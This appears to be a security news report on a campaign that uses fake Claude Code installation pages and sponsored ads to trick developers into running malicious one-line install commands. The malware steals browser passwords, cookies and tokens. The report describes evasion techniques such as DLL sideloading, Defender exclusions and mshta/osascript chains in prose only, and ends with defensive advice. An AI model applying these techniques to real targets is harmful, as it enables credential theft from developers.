Fake Claude Code Installers Used to Steal Developer Browser Credentials

Cybersecurity researchers uncovered an active malware campaign targeting software developers through fake installation pages impersonating Anthropic’s Claude Code platform. The operation relies heavily on social engineering and malicious search advertisements to trick victims into downloading or executing malware disguised as legitimate AI development tooling. The campaign demonstrates a growing trend where attackers exploit the popularity and rapid adoption of AI-assisted coding tools to compromise developer environments and steal sensitive browser data.

The attack typically begins when a developer searches online for terms such as “install Claude Code” or “Claude Code CLI.” Attackers purchase sponsored search advertisements that appear above legitimate results, redirecting victims to convincing lookalike websites that closely mimic official Claude documentation pages. These fake pages replicate branding, layouts, installation guides, and command-line instructions in order to appear authentic to technically experienced users.

A critical element of the campaign is the abuse of modern one-line installation workflows commonly used in developer tooling. Instead of downloading software traditionally, many modern AI and development utilities instruct users to run terminal commands that automatically fetch and execute scripts from remote servers. Attackers exploit this trust model by replacing legitimate installation commands with malicious alternatives that silently download malware payloads from attacker-controlled infrastructure. In several observed cases, the visible command differed subtly from the legitimate one, using deceptive domains that closely resembled official services.

Once executed, the malicious scripts deploy heavily obfuscated PowerShell or shell-based loaders depending on the victim’s operating system. Researchers observed the malware specifically targeting Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, and other developer-focused browsers. The malware extracts encrypted browser keys, authentication tokens, saved passwords, session cookies, and in some cases stored payment information. This enables attackers to hijack active sessions and gain unauthorized access to cloud platforms, developer tools, and enterprise environments without needing the victim’s password directly.

The campaign also demonstrates advanced operational security techniques. Some malware variants check system region settings and avoid execution in specific countries, likely to evade local law enforcement attention or security researchers. Others use DLL sideloading techniques involving legitimately signed executables to make malicious activity appear trusted to endpoint security tools. Cleanup scripts are also deployed to delete traces of the initial installer, leaving only the persistent malware components active on the system.

Researchers identified multiple malware families associated with the campaign, including credential stealers, remote access backdoors, and infostealers targeting both Windows and macOS systems. Some variants also manipulate Windows Defender exclusions or leverage tools such as mshta.exe and PowerShell to evade detection. On macOS systems, attackers used obfuscated shell commands and osascript execution chains to deploy malware payloads while appearing as legitimate setup instructions.

The impact of this campaign is particularly severe because developer systems represent high-value targets within organizations. Compromising a developer workstation can provide attackers with access to source code repositories, cloud credentials, API tokens, CI/CD pipelines, and internal infrastructure. Stolen browser sessions may also bypass multi-factor authentication protections if active authentication tokens are captured successfully. As a result, a single compromised workstation can potentially lead to broader supply chain or enterprise compromise.

The campaign highlights how attackers are increasingly targeting trust relationships rather than exploiting technical vulnerabilities alone. Instead of breaking into systems directly, threat actors manipulate normal developer behavior and exploit the trust placed in installation commands, sponsored search results, and popular AI platforms. This approach is highly effective because it blends naturally into common development workflows and appears legitimate even to technically skilled users.

Organizations are advised to educate developers about the risks associated with copy-paste installation commands and sponsored search results. Security teams should implement browser session monitoring, restrict execution of unsigned scripts where possible, and monitor for suspicious process chains involving developer tools launching PowerShell or scripting engines. Additional protections include DNS filtering for newly registered domains, endpoint detection capable of identifying infostealer behavior, and isolation of development environments handling sensitive credentials.

In conclusion, the fake Claude Code installer campaign demonstrates a new generation of socially engineered attacks targeting developers through AI ecosystem trust. By abusing installation workflows, fake documentation pages, and developer curiosity around AI tooling, attackers are able to deploy sophisticated credential-stealing malware with minimal technical exploitation required. The incident reinforces the importance of zero-trust principles within developer workflows and highlights how rapidly emerging AI ecosystems are becoming prime targets for modern cybercrime operations.